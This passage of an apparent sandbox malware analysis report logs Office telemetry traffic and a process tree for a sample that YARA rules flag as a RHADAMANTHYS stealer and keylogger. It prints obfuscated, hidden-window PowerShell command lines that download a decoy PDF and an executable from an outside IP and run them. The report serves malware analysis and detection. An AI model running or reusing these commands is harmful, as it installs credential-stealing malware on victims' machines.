                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:55 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1399
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                                      x-ms-request-id: 0e3f3dcd-301e-001f-2cd1-45aa3a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125955Z-1746fd949bd4w8sthC1EWR70040000000120000000002w15
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:56 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      148192.168.2.44991413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:55 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:55 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1362
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                      x-ms-request-id: 8c86af4e-801e-00a3-6fcc-457cfb000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125955Z-1746fd949bdxk6n6hC1EWRdr8c0000000140000000004z9x
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:56 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      149192.168.2.44991513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:56 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:56 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1425
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                      x-ms-request-id: 577422f4-d01e-00ad-48c3-45e942000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125956Z-1746fd949bdwt8wrhC1EWRu6rg00000001ag000000009m2t
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:56 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:07:57:57
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                                                                                                                                                      Imagebase:0x7ff6fe9a0000
                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:07:57:57
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:07:57:57
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:07:58:03
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" "
                                                                                                                                                      Imagebase:0x7ff6fe9a0000
                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:07:58:03
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:07:58:04
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""
                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:07:58:09
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\readme.pdf
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:07:58:10
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:07:58:11
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\readme.pdf"
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:07:58:11
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2128,i,2616988406370939895,15394173606116148119,262144 /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:07:58:11
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:07:58:14
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6404 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:6
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:07:58:14
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6672 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:07:58:14
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:07:58:17
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                                                                                                                                                      Imagebase:0x7ff6f0d10000
                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                      MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:18
                                                                                                                                                      Start time:07:58:17
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                                                                                                                                                      Imagebase:0x7ff6f0d10000
                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                      MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:19
                                                                                                                                                      Start time:07:58:20
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\123123213123123321132.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:2'764'800 bytes
                                                                                                                                                      MD5 hash:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 21%, ReversingLabs
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:22
                                                                                                                                                      Start time:07:58:27
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:07:58:28
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2100,i,965329265316757601,16489073601455503628,262144 /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:07:58:36
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:07:58:37
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2040,i,9689518798590709034,10875884163289522825,262144 /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:26
                                                                                                                                                      Start time:07:58:41
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\123123213123123321132.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:2'764'800 bytes
                                                                                                                                                      MD5 hash:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001A.00000003.2118974534.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001A.00000002.2129262237.0000000000CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:27
                                                                                                                                                      Start time:07:58:43
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                      Imagebase:0x570000
                                                                                                                                                      File size:676'584 bytes
                                                                                                                                                      MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001B.00000003.2123513002.0000000003390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001B.00000002.2231344124.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:07:58:43
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 320
                                                                                                                                                      Imagebase:0xa0000
                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
